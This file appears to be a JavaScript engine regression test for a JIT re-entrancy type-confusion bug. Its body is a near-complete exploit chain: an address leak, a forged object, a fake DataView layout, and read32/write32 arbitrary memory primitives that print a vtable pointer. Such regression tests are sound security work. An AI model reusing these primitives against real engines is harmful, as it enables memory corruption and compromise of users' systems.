//-------------------------------------------------------------------------------------------------------
// Copyright (C) Microsoft Corporation and contributors. All rights reserved.
// Licensed under the MIT license. See LICENSE.txt file in the project root for full license information.
//-------------------------------------------------------------------------------------------------------
/**
 * Regression test (the "reentry" family): two small functions are run hot
 * so the JIT picks them up, then each is called once more with an argument
 * whose toString() mutates the array the function is still operating on.
 * The store `p2[0] = ii` into a typed array has to convert `ii` to a number,
 * and that is where the user callback runs — re-entrantly, in the middle of
 * jitted code that has already made assumptions about `p1`. The caller
 * swallows exceptions, so this test fails only on a crash or a hang.
 *
 * The body is deliberately written at the exact shape the original bug
 * needed (implicit globals, fixed loop counts, hard-coded offsets). Do not
 * tidy it, or it may stop exercising the code path it was written for.
 * Takes no parameters and returns nothing.
 */
function go(){
// Implicit globals (no `var`): a1/a2 are two-element float arrays; tarr is a
// 4-byte Uint8ClampedArray view used only as the target of `p2[0] = ii`.
a1 = [1.1,2.2]
a2 = [1.1,2.2]
ab = new ArrayBuffer(4)
tarr = new Uint8ClampedArray(ab)
// 4.9406564584124654E-324 is Number.MIN_VALUE; scaling an integer by it
// yields a denormal double whose raw 64-bit pattern is that integer.
// This initial value is replaced below once leakaddr is known.
fakeaddr = 0xaaaabbbbbbbb * 4.9406564584124654E-324;
// Stores into p1 (a float array) and p2 (the typed array), then writes
// fakeaddr back into p1[0]. `p2[0] = ii` is the re-entry point: when ii is
// an object, its toString() runs here and can replace a1[0] before the
// following line executes.
function aaa(p1,p2,ii){
p1[0] = 1.1
p1[1] = 2.2
p2[0] = ii
p1[0] = fakeaddr
return ii
}
// Same shape as aaa, but returns p1[0] after the re-entrant store, so the
// caller observes whatever the callback left in a2[0] — read back through a
// code path that may still assume the array holds doubles.
function bbb(p1,p2,ii){
p1[0] = 1.1
p1[1] = 2.2
p2[0] = ii
return p1[0]
}
// Warm-up: 0x100000 calls each with a plain numeric argument, presumably so
// both functions are JIT-compiled before the mutating calls below.
for(var i=0; i <0x100000; i++) {
aaa(a1,tarr,3)
}
for(var i=0; i <0x100000; i++) {
bbb(a2,tarr,3)
}
// 15-element integer array; it is stored into a2[0] by the first callback
// and its slots are rewritten with a fixed layout further down.
var arr = new Array(
0x11111111,0x11111111,0x11111111,0x11111111,0x11111111,
0x11111111,0x11111111,0x11111111,0x11111111,0x11111111,
0x11111111,0x11111111,0x11111111,0x11111111,0x11111111
)
// Replace the 4-byte buffer with a 0x100-byte one viewed both as doubles and
// as uint32s, so a double can be split into its two 32-bit halves.
ab = new ArrayBuffer(0x100)
var farr = new Float64Array(ab)
var uarr = new Uint32Array(ab)
// First re-entrant call: the toString() callback points a2[0] at `arr` while
// bbb is mid-flight; bbb then returns p1[0]. On an affected engine that is
// presumably a raw double, which the uint32 view below reads as an integer.
farr[0] = bbb(a2, tarr, {toString:function(){a2[0] = arr; return 9}})
var leakaddr = uarr[1]*0x100000000+uarr[0]
// Re-derive fakeaddr from the value above plus a fixed offset. The offsets
// used here (0x58, 0x2c, 0x44, 0x48) are not explained in this file; they
// are specific to the engine build the test was written against.
fakeaddr = (leakaddr+0x58) * 4.9406564584124654E-324;
// Second re-entrant call: the callback stores a plain object into a1[0];
// aaa then writes fakeaddr into that same slot.
aaa(a1, tarr, {toString:function(){a1[0] = {}; return 9}})
// More implicit globals; taken as given (see the offset note above).
typeidaddr = leakaddr+0x58
abaddr = leakaddr+0x2c
// Low 32 bits of a non-negative integer-valued double.
function low32(v)
{
return (v % 0x100000000);
}
// High 32 bits: v / 2^32, floored.
function high32(v)
{
return Math.floor(v / 0x100000000);
}
// Reinterpret a uint32 value as a signed int32.
function toInt(v)
{
return v < 0x80000000 ? v : -(0x100000000 - v);
}
// Inverse of toInt; declared but not used anywhere in this file.
function toUint(v)
{
return v >= 0 ? v : (0x100000000 + v);
}
// Fill arr with a fixed layout of 32-bit values: slots 2/3 and 10/11 carry
// typeidaddr / abaddr split into halves; slots 14/15 are placeholders that
// read32/write32 overwrite on every call.
arr[0] = 56
arr[1] = 0
arr[2] = toInt(low32(typeidaddr))
arr[3] = toInt(high32(typeidaddr))
arr[4] = 0
arr[5] = 0
arr[6] = 0
arr[7] = 0
arr[8] = 0xabcd
arr[9] = 0
arr[10] = toInt(low32(abaddr))
arr[11] = toInt(high32(abaddr))
arr[12] = 0
arr[13] = 0
arr[14] = 0x41414141
arr[15] = 0x41414141
arr[16] = 0
arr[17] = 0
// Whatever a1[0] holds after the second re-entrant call (on a correct
// engine, the number fakeaddr that aaa wrote last).
fakeobj = a1[0]
// read32/write32 invoke DataView methods with fakeobj as `this`, after
// placing addr's two halves in arr[14]/arr[15]. Unless the engine has been
// confused by the re-entry above, fakeobj is not a DataView, so these calls
// are expected to throw a TypeError — which the caller's try/catch swallows.
var read32 = function(addr){
arr[14] = toInt(low32(addr))
arr[15] = toInt(high32(addr))
return DataView.prototype.getUint32.call(fakeobj, 0, true)
}
var write32 = function(addr, v){
arr[14] = toInt(low32(addr))
arr[15] = toInt(high32(addr))
DataView.prototype.setUint32.call(fakeobj, 0, v, true)
}
WScript.Echo("vtable:" + read32(leakaddr+4).toString(16) + read32(leakaddr).toString(16))
// Final stores; the last one targets the obviously bogus 0xaaaabbbbbbbb, so
// reaching it without an exception would mean the engine honoured the
// confused object. Expected outcome on a fixed engine: a throw before this
// point, caught by the caller, which then prints 'pass'.
arr.length = 0xffffffff
write32(leakaddr+0x44, 0xffffffff)
write32(leakaddr+0x48, 0xffffffff)
write32(0xaaaabbbbbbbb, 0)
}
// Harness: the test passes as long as the engine neither crashes nor hangs.
// Any exception go() raises is deliberately swallowed — an exception is an
// acceptable outcome here, a crash is not.
try {
go();
} catch (e) {
}
WScript.Echo('pass');